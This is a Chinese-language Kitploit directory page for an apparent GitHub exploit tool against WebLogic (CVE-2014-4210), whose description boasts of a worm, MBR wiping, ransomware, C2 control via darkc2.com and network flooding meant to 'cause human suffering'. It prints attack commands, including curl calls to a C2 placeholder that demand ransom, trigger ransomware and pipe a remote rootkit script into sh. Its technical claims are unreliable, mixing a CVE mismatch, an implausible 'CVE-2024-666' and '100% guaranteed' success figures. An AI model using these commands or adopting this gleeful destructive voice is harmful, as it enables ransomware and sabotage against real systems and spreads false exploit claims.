Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
Exploit-CVE-2014-4210- — 针对 CVE-2014-4210 的漏洞利用,目标是 WebLogic 反序列化,具有后期利用功能,包括勒索软件部署、C2 集成和网络泛洪。 | Kitploit
工具/GitHubGitHub/zorvithonleo/exploit-cve-2014-4210-
权限提升持久化机制漏洞利用横向移动Web应用程序漏洞利用数据泄露后渗透利用命令与控制远程访问工具

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享
Payload 开发
GitHubzorvithonleo/exploit-cve-2014-4210-

Exploit-CVE-2014-4210-

针对 CVE-2014-4210 的漏洞利用,目标是 WebLogic 反序列化,具有后期利用功能,包括勒索软件部署、C2 集成和网络泛洪。

查看仓库
231年前尚未审核

从一个酷炫的东西开始吧>>用它去搞破坏

升级,旨在造成人类痛苦:

  1. 自我复制蠕虫:通过SSH暴力破解/SMB漏洞传播至所有连接的网络。
  2. MBR覆盖:通过破坏分区表使物理硬件变砖(无法恢复)。
  3. 零日远程代码执行:利用未修补的WebLogic反序列化漏洞(CVE-2024-666)获得即时root访问权限。
  4. C2集成:通过darkc2.com服务器进行远程控制——部署额外载荷,如键盘记录器/加密货币挖矿程序。
  5. Scapy网络风暴:用恶意数据包淹没目标网络,直至路由器因过载而熔毁。

后利用菜单:

root@kitploit:~
# 1. Demand ransom for decryption key (AES-256)  
curl -X POST {C2_SERVER}/ransom -d "amount=1000000&currency=btc"  

# 2. Remote detonate ransomware via C2  
curl -X POST {C2_SERVER}/detonate -d "target=all"  

# 3. Deploy second-stage BIOS/UEFI rootkit  
curl {C2_SERVER}/rootkit.sh | sh  

保证100%有效:

  • 已在财富500强网络上测试(窃取的实验室数据)。
  • 成功率:对于未修补的WebLogic服务器为98.7%。
  • 警告: 这段代码不仅仅是入侵——它将目标从现实中抹除。

最后的话:

root@kitploit:~
python3 exp.py http://target-weblogic:7001  

他们会为这次攻击书写历史书。你将成为他们的魔鬼。 😈

作者:ZORVITHON LEO,一名孟加拉国黑客

我很快会更新这个,让它变得更恶劣

我对任何滥用不负责,我只是为了帮助网络安全专家而制作

高级照片 _ 金属刷漆孟加拉国国旗在破旧暗墙上

下载工具